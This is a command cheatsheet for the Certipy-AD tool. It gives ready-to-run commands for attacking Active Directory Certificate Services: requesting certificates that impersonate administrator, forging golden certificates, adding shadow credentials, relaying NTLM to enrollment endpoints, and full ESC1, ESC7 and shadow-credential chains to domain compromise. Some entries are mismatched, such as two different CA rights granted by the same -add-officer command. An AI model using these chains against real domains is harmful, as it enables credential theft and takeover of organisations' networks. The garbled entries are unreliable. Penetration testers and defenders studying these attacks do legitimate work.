Certipy-AD¶

Certipy-AD Cheatsheet¶

Installation¶

Using pip

pip install certipy-ad

Using pipx

pipx install certipy-ad

From GitHub (latest)

git clone https://github.com/ly4k/Certipy.git
cd Certipy
python setup.py install

Authentication Methods¶

Password Authentication

certipy [command] -u $username@$domain -p $password -dc-ip $dc_ip

Hash Authentication (NTLM)

certipy [command] -u $username@$domain -hashes :$ntlm_hash -dc-ip $dc_ip

Kerberos Authentication

certipy [command] -u $username@$domain -k -no-pass -dc-ip $dc_ip

PFX Certificate Authentication

certipy auth -pfx $certificate.pfx -dc-ip $dc_ip

Enumeration¶

Find Vulnerable Certificate Templates (All)

certipy find -u $username@$domain -p $password -dc-ip $dc_ip

Vulnerable Templates Only

certipy find -u $username@$domain -p $password -dc-ip $dc_ip -vulnerable

Output to Different Formats

# JSON output (default)
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -json

# Text output
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -text

# Stdout output
certipy find -u $username@$domain -p $password -dc-ip $dc_ip -stdout

Enumerate Specific CA

certipy find -u $username@$domain -p $password -dc-ip $dc_ip -ca $ca_name

Enable/Disable Vulnerability Checks

certipy find -u $username@$domain -p $password -dc-ip $dc_ip -enabled

Get Certificate Templates Details

certipy find -u $username@$domain -p $password -dc-ip $dc_ip -scheme ldaps

Certificate Request¶

Request Certificate from Template

certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -dc-ip $dc_ip

Request with Subject Alternative Name (SAN)

certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -upn $target_user@$domain -dc-ip $dc_ip

Request with DNS SAN

certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -dns $dc.$domain -dc-ip $dc_ip

Request on Behalf of Another User (Enrollment Agent)

certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -on-behalf-of $domain\\$target_user -pfx $enrollment_agent.pfx -dc-ip $dc_ip

Request with Custom Subject

certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -subject "CN=$target_user,CN=Users,DC=$domain,DC=local" -dc-ip $dc_ip

Authentication with Certificates¶

Authenticate with PFX (Get TGT)

certipy auth -pfx $certificate.pfx -dc-ip $dc_ip

Authenticate and Get NTLM Hash

certipy auth -pfx $certificate.pfx -username $username -domain $domain -dc-ip $dc_ip

LDAP Shell with Certificate

certipy auth -pfx $certificate.pfx -ldap-shell -dc-ip $dc_ip

Authenticate Without Password

certipy auth -pfx $certificate.pfx -no-hash -dc-ip $dc_ip

Shadow Credentials¶

Add Shadow Credentials (Key Credentials)

certipy shadow auto -u $username@$domain -p $password -account $target_account -dc-ip $dc_ip

Add Shadow Credentials with Device Certificate

certipy shadow auto -u $username@$domain -p $password -account $target_account -device-id $device_id -dc-ip $dc_ip

List Shadow Credentials

certipy shadow list -u $username@$domain -p $password -account $target_account -dc-ip $dc_ip

Remove Shadow Credentials

certipy shadow remove -u $username@$domain -p $password -account $target_account -device-id $device_id -dc-ip $dc_ip

Golden Certificates¶

Forge Golden Certificate (with CA Certificate)

certipy forge -ca-pfx $ca_certificate.pfx -upn $target_user@$domain -subject "CN=$target_user,CN=Users,DC=$domain,DC=local"

Forge with Specific Template

certipy forge -ca-pfx $ca_certificate.pfx -upn administrator@$domain -template "User"

Forge with Custom Serial Number

certipy forge -ca-pfx $ca_certificate.pfx -upn $target_user@$domain -serial $serial_number

Certificate Renewal¶

Renew Existing Certificate

certipy req -u $username@$domain -p $password -ca $ca_name -template $template_name -renew -dc-ip $dc_ip

ESC1 - Vulnerable Certificate Template¶

Request Certificate with Arbitrary SAN

certipy req -u $username@$domain -p $password -ca $ca_name -template $vulnerable_template -upn administrator@$domain -dc-ip $dc_ip

Authenticate with ESC1 Certificate

certipy auth -pfx administrator.pfx -dc-ip $dc_ip

ESC2 - Vulnerable Certificate Template (Any Purpose)¶

Request Certificate

certipy req -u $username@$domain -p $password -ca $ca_name -template $esc2_template -dc-ip $dc_ip

ESC3 - Enrollment Agent Certificate¶

Request Enrollment Agent Certificate

certipy req -u $username@$domain -p $password -ca $ca_name -template "Enrollment Agent" -dc-ip $dc_ip

Request Certificate on Behalf of Another User

certipy req -u $username@$domain -p $password -ca $ca_name -template "User" -on-behalf-of "$domain\\Administrator" -pfx $enrollment_agent.pfx -dc-ip $dc_ip

ESC4 - Vulnerable Certificate Template ACLs¶

Modify Template (Requires Write Access)

certipy template -u $username@$domain -p $password -template $template_name -save-old -dc-ip $dc_ip

Enable SAN in Template

certipy template -u $username@$domain -p $password -template $template_name -altname -dc-ip $dc_ip

ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2¶

Request Certificate with Arbitrary SAN (No Template Enrollment Rights)

certipy req -u $username@$domain -p $password -ca $ca_name -template "User" -upn administrator@$domain -dc-ip $dc_ip

ESC7 - Vulnerable CA ACLs¶

Grant Manage CA Rights

certipy ca -u $username@$domain -p $password -ca $ca_name -add-officer $username -dc-ip $dc_ip

Grant Manage Certificates Rights

certipy ca -u $username@$domain -p $password -ca $ca_name -add-officer $username -dc-ip $dc_ip

Enable EDITF_ATTRIBUTESUBJECTALTNAME2

certipy ca -u $username@$domain -p $password -ca $ca_name -enable-san -dc-ip $dc_ip

Issue Pending Certificate

certipy ca -u $username@$domain -p $password -ca $ca_name -issue-request $request_id -dc-ip $dc_ip

ESC8 - NTLM Relay to HTTP Enrollment¶

Start NTLM Relay Server

certipy relay -target "http://$ca_server/certsrv/certfnsh.asp" -template $template_name

With Specific CA

certipy relay -ca $ca_name -template $template_name -target "http://$ca_server/certsrv/certfnsh.asp"

ESC9 - No Security Extension¶

Request Certificate with GenericWrite on User

certipy req -u $username@$domain -p $password -ca $ca_name -template "ESC9-Vulnerable" -upn $target@$domain -dc-ip $dc_ip

Modify User's UPN

certipy account update -u $username@$domain -p $password -user $target_user -upn "Administrator@$domain" -dc-ip $dc_ip

Request Certificate with Modified UPN

certipy req -u $username@$domain -p $password -ca $ca_name -template "ESC9-Vulnerable" -dc-ip $dc_ip

Restore Original UPN

certipy account update -u $username@$domain -p $password -user $target_user -upn "$target_user@$domain" -dc-ip $dc_ip

ESC10 - Weak Certificate Mappings¶

Case 1: GenericWrite on Any Account

certipy account update -u $username@$domain -p $password -user $target_user -altname "Administrator@$domain" -dc-ip $dc_ip

Case 2: Compromise Any Account via Shadow Credentials

certipy shadow auto -u $username@$domain -p $password -account $target_user -dc-ip $dc_ip

ESC11 - NTLM Relay to RPC¶

Relay NTLM to Certificate Enrollment via RPC

certipy relay -target "rpc://$ca_server" -ca $ca_name -template $template_name

ESC13 - OID Group Link Abuse¶

Request Certificate with Issuance Policy

certipy req -u $username@$domain -p $password -ca $ca_name -template $template_with_oid -dc-ip $dc_ip

Certificate Operations¶

Parse PFX Certificate

certipy cert -pfx $certificate.pfx -password $pfx_password -export -out $output_name

Export Certificate and Key Separately

certipy cert -pfx $certificate.pfx -nocert -out $key.key
certipy cert -pfx $certificate.pfx -nokey -out $cert.crt

Create PFX from PEM

certipy cert -cert $cert.pem -key $key.pem -export -out $output.pfx

Account Operations¶

Update User Principal Name

certipy account update -u $username@$domain -p $password -user $target_user -upn "newupn@$domain" -dc-ip $dc_ip

Update DNS Hostname

certipy account update -u $username@$domain -p $password -user 'COMPUTER$' -dns "attacker.$domain" -dc-ip $dc_ip

Update SPN

certipy account update -u $username@$domain -p $password -user $target_user -spn "HTTP/attacker.$domain" -dc-ip $dc_ip

CA Operations¶

List Certificate Authorities

certipy ca -u $username@$domain -p $password -list -dc-ip $dc_ip

Backup CA Certificate

certipy ca -u $username@$domain -p $password -ca $ca_name -backup -dc-ip $dc_ip

Template Operations¶

List All Templates

certipy template -u $username@$domain -p $password -list -dc-ip $dc_ip

Get Template Configuration

certipy template -u $username@$domain -p $password -template $template_name -dc-ip $dc_ip

Restore Template Configuration

certipy template -u $username@$domain -p $password -template $template_name -configuration $template.json -dc-ip $dc_ip

ADCS Relay¶

HTTP Endpoint

certipy relay -target "http://$ca_server/certsrv/certfnsh.asp" -template $template_name -ca $ca_name

RPC Endpoint

certipy relay -target "rpc://$ca_server" -template $template_name -ca $ca_name

With Domain Credentials

certipy relay -target "http://$ca_server/certsrv/certfnsh.asp" -template $template_name -ca $ca_name -domain $domain

Useful Combinations¶

Full ESC1 Attack Chain

# 1. Find vulnerable template
certipy find -u $username@$domain -p $password -vulnerable -dc-ip $dc_ip

# 2. Request certificate with admin SAN
certipy req -u $username@$domain -p $password -ca $ca_name -template $vulnerable_template -upn administrator@$domain -dc-ip $dc_ip

# 3. Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip $dc_ip

Full Shadow Credentials Attack

# 1. Add shadow credentials
certipy shadow auto -u $username@$domain -p $password -account $target_computer$ -dc-ip $dc_ip

# 2. Authenticate with the generated certificate
certipy auth -pfx $target_computer.pfx -dc-ip $dc_ip

ESC7 Full Chain

# 1. Add yourself as officer
certipy ca -u $username@$domain -p $password -ca $ca_name -add-officer $username -dc-ip $dc_ip

# 2. Enable SAN
certipy ca -u $username@$domain -p $password -ca $ca_name -enable-san -dc-ip $dc_ip

# 3. Request certificate with SAN
certipy req -u $username@$domain -p $password -ca $ca_name -template SubCA -upn administrator@$domain -dc-ip $dc_ip

# 4. Issue pending certificate
certipy ca -u $username@$domain -p $password -ca $ca_name -issue-request $request_id -dc-ip $dc_ip

# 5. Retrieve issued certificate
certipy req -u $username@$domain -p $password -ca $ca_name -retrieve $request_id -dc-ip $dc_ip

Important Notes¶

Common Variables:

$domain = Domain name (e.g., corp.local)
$username = Your username
$password = Your password
$ca_name = Certificate Authority name (e.g., CORP-CA)
$template_name = Certificate template name
$dc_ip = Domain Controller IP address
$ca_server = CA server hostname/IP
$target_user = Target username for impersonation
$ntlm_hash = NTLM hash (32 hex characters)

Output Files:

Default output: [timestamp]_Certipy.txt (find command)
Certificates: [username].pfx or [username].crt and [username].key
JSON output: [timestamp]_Certipy.json

Authentication Priority:

Kerberos ticket (if -k is specified)
NTLM hash (if -hashes is specified)
Password (if -p is specified)
Certificate (if -pfx is specified)

Common Vulnerable Templates:

ESC1: Client Authentication + ENROLLEE_SUPPLIES_SUBJECT
ESC2: Any Purpose EKU
ESC3: Certificate Request Agent
ESC4: Write permissions on template
ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag on CA

Useful Flags:

-debug - Enable debug output
-no-pass - Don't ask for password (Kerberos)
-ldaps - Use LDAPS instead of LDAP
-silent - Reduce output verbosity
-scheme - LDAP scheme (ldap/ldaps/gc/gcs)
-ns - Nameserver for DNS resolution
-dns-tcp - Use TCP for DNS queries
-timeout - Timeout for connections

PFX Password:

Default password for generated PFX files is usually empty or "Certipy"
Use -pfx-password to specify custom password when creating PFX

Time Synchronization:

Ensure time sync with DC (within 5 minutes)
Use ntpdate $dc_ip or rdate -n $dc_ip if needed

Certificate Validity:

Certificates are typically valid for 1-2 years
Check with openssl x509 -in cert.crt -text -noout

Troubleshooting:

Use -debug flag for detailed error messages
Check Kerberos tickets with klist
Verify connectivity with ldapsearch or rpcclient
Ensure proper DNS resolution for domain and DC